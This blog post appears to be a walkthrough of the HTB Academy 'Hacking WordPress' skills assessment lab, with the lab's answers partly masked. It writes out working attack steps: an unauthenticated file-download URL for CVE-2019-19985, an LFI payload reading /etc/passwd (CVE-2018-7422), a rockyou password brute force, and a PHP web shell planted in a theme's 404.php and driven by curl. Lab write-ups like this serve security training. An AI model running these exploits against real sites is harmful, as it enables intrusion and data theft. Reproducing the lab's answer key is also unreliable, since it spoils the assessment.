Post

HTB Academy: Hacking WordPress Module

Skills Assessment

Penetration Test Scenario

You have been contracted to perform an external penetration test against the company INLANEFREIGHT that is hosting one of their main public-facing websites on WordPress.

Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.

Questions

  1. Identify the WordPress version number.
  2. Identify the WordPress theme in use.
  3. Submit the contents of the flag file in the directory with directory listing enabled.
  4. Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)
  5. Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
  6. What is the version number of the plugin vulnerable to an LFI?
  7. Use the LFI to identify a system user whose name starts with the letter “f”.
  8. Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

Answers

For identifying the WordPress version number and theme, use one of these tools:

  • Wappalyzer Extension
  • View Page Source or DevTools
  • nmap scan
  • wpscan —url http://<target_ip> —enumerate p

For receiving results, add target IP to hosts:

1
sudo nano /etc/hosts

Add: <target_ip> blog.inlanefreight.local

Refresh your browser. Now you can find the WordPress version number and theme with Wappalyzer, View Page Source/DevTools, or use wpscan.

  • WordPress version number: 5.1.6
  • WordPress theme in use: Twenty Nineteen

In our wpscan, we can find a link:

http://blog.inlanefreight.local/wp-content/uploads/

You can open this link in the browser or use the terminal:

1
curl http://blog.inlanefreight.local/wp-content/uploads/upload_flag.txt | html2text
  • Flag: HTB{d1sabl3_……………..!}

For finding users:

1
wpscan --url http://blog……/ --enumerate u
  • Non-admin user: Cha** Wig**

In our wpscan, we can find vulnerable plugins and search about them on Google.

One of the plugins:

  • WordPress Plugin: Email Subscribers & Newsletters 4.2.2
  • CVE: CVE-2019-19985

Exploit Details

  • Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 — Unauthenticated File Download
  • Google Dork: “Stable tag” inurl:wp-content/plugins/email-subscribers/readme.txt
  • Date: 2020–07–20
  • Exploit Author: KBA@SOGETI_ESEC
  • Vendor Homepage: Email Subscribers
  • Software Link: Plugin Archive
  • Version: <= 4.2.2
  • Tested on: Email Subscribers & Newsletters 4.2.2
  • CVE: CVE-2019–19985

Example Command:

1
curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
  • Flag from vulnerable plugin: HTB{unauTH_……..!}

From our wpscan, we can search the exploit database for:

  • Vulnerable Plugin: Site Editor
  • CVE ID: CVE-2018-7422
  • Product: Site Editor WordPress Plugin — Site Editor
  • Vendor: Site Editor
  • Tested version: 1.1.1
  • CVE ID: CVE-2018–7422

Proof of Concept

1
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
  • Version number of the plugin vulnerable to an LFI: 1.1.1

Use Proof of Concept:

1
http://<$TARGET>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
  • System user: frank.mclane

Obtain a shell on the system and submit the contents of the flag in the /home/erika directory:

1
wpscan --url http://blog.inlanefreight.local/ -U erika --passwords /usr/share/wordlists/rockyou.txt

Login with: erika:010203

Go to the theme editor. Select the Twenty Sixteen Theme. Add to the 404.php page:

1
system ($_GET['cmd']);

Save and check how it works:

1
2
3
4
5
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=id'
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=pwd'
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=ls+/home/erika'
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=cat+/home/erika/dxxxxxxx603c_flag.txt'

  • Final Flag: HTB{w0rdPr355_………7}

    HTB Academy Badge

Hacking WordPress Module

Great! Happy Hacking

This post is licensed under CC BY 4.0 by the author.